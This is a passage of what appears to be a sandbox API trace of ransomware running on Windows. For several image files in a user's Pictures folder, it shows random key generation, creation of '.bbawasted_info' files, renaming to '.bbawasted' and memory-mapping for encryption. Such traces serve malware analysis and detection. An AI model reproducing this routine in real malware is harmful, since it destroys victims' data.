szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0075.192] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.192] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.192] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0075.193] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.193] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.233] SetEndOfFile (hFile=0x11c) returned 1 [0075.235] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.235] CloseHandle (hObject=0x11c) returned 1 [0075.237] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0075.237] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.238] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.238] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\GMhiLXxjcnpC8s_2-L.bmp") returned 78 [0075.238] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a6) returned 0x5d2990 [0075.238] lstrcpyW (in: lpString1=0x5d2a2c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.238] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.238] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.238] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.239] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\GMhiLXxjcnpC8s_2-L.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\gmhilxxjcnpc8s_2-l.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.239] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.240] SetEndOfFile (hFile=0x11c) returned 1 [0075.240] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.240] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.240] lstrcpyW (in: lpString1=0x5d2a2c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\GMhiLXxjcnpC8s_2-L.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\gmhilxxjcnpc8s_2-l.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\GMhiLXxjcnpC8s_2-L.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\gmhilxxjcnpc8s_2-l.bmp.bbawasted")) returned 1 [0075.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\GMhiLXxjcnpC8s_2-L.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\gmhilxxjcnpc8s_2-l.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.241] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0075.242] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0075.243] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.243] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.243] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0075.243] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.244] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.252] SetEndOfFile (hFile=0x11c) returned 1 [0075.254] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.254] CloseHandle (hObject=0x11c) returned 1 [0075.256] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0075.256] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.258] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.258] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\IsXY 5NEye.jpg") returned 70 [0075.258] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x296) returned 0x5d2990 [0075.258] lstrcpyW (in: lpString1=0x5d2a1c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.258] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.258] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.259] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.259] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\IsXY 5NEye.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\isxy 5neye.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.259] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.260] SetEndOfFile (hFile=0x11c) returned 1 [0075.260] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.260] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.260] lstrcpyW (in: lpString1=0x5d2a1c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\IsXY 5NEye.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\isxy 5neye.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\IsXY 5NEye.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\isxy 5neye.jpg.bbawasted")) returned 1 [0075.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PwBncZJNNFXo\\IsXY 5NEye.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pwbnczjnnfxo\\isxy 5neye.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0075.261] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.264] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0075.265] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.265] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.265] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0075.266] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.266] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.322] SetEndOfFile (hFile=0x11c) returned 1 [0075.325] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.325] CloseHandle (hObject=0x11c) returned 1 [0075.326] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0075.326] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.327] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.327] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Tjzer.png") returned 52 [0075.327] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x272) returned 0x5d0700 [0075.327] lstrcpyW (in: lpString1=0x5d0768, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.327] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.327] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.328] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.328] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Tjzer.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tjzer.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.329] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.330] SetEndOfFile (hFile=0x11c) returned 1 [0075.330] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.330] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.330] lstrcpyW (in: lpString1=0x5d0768, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Tjzer.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tjzer.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Tjzer.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tjzer.png.bbawasted")) returned 1 [0075.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Tjzer.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tjzer.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0075.331] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0075.332] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0075.333] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0075.333] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.333] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0075.333] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.333] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.389] SetEndOfFile (hFile=0x11c) returned 1 [0075.391] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.391] CloseHandle (hObject=0x11c) returned 1 [0075.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0075.393] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0075.394] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.394] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.395] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\cPhCCIEKuZgoipLJ.bmp") returned 68 [0075.395] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5d2990 [0075.395] lstrcpyW (in: lpString1=0x5d2a18, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.395] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.395] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.396] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.396] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\cPhCCIEKuZgoipLJ.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\cphcciekuzgoiplj.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.397] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.398] SetEndOfFile (hFile=0x11c) returned 1 [0075.398] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.398] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.398] lstrcpyW (in: lpString1=0x5d2a18, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\cPhCCIEKuZgoipLJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\cphcciekuzgoiplj.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\cPhCCIEKuZgoipLJ.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\cphcciekuzgoiplj.bmp.bbawasted")) returned 1 [0075.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\cPhCCIEKuZgoipLJ.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\cphcciekuzgoiplj.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0075.399] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0075.400] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0075.401] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0075.401] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.401] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0075.402] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0075.402] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0075.411] SetEndOfFile (hFile=0x11c) returned 1 [0076.191] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.191] CloseHandle (hObject=0x11c) returned 1 [0076.192] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0076.193] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.193] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.193] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.194] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\l-86v.png") returned 57 [0076.194] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5d0700 [0076.194] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.194] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.194] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.194] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.194] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\l-86v.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\l-86v.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.195] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.196] SetEndOfFile (hFile=0x11c) returned 1 [0076.196] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.197] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.197] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\l-86v.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\l-86v.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\l-86v.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\l-86v.png.bbawasted")) returned 1 [0076.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\l-86v.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\l-86v.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.197] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.199] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0076.200] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0076.200] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.200] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0076.201] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.201] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.209] SetEndOfFile (hFile=0x11c) returned 1 [0076.211] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.211] CloseHandle (hObject=0x11c) returned 1 [0076.213] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0076.213] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.214] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.214] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\-G40a_oPR4.bmp") returned 80 [0076.214] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5bf070 [0076.214] lstrcpyW (in: lpString1=0x5bf110, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.214] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.214] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.214] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.215] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\-G40a_oPR4.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\-g40a_opr4.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.215] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.216] SetEndOfFile (hFile=0x11c) returned 1 [0076.216] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 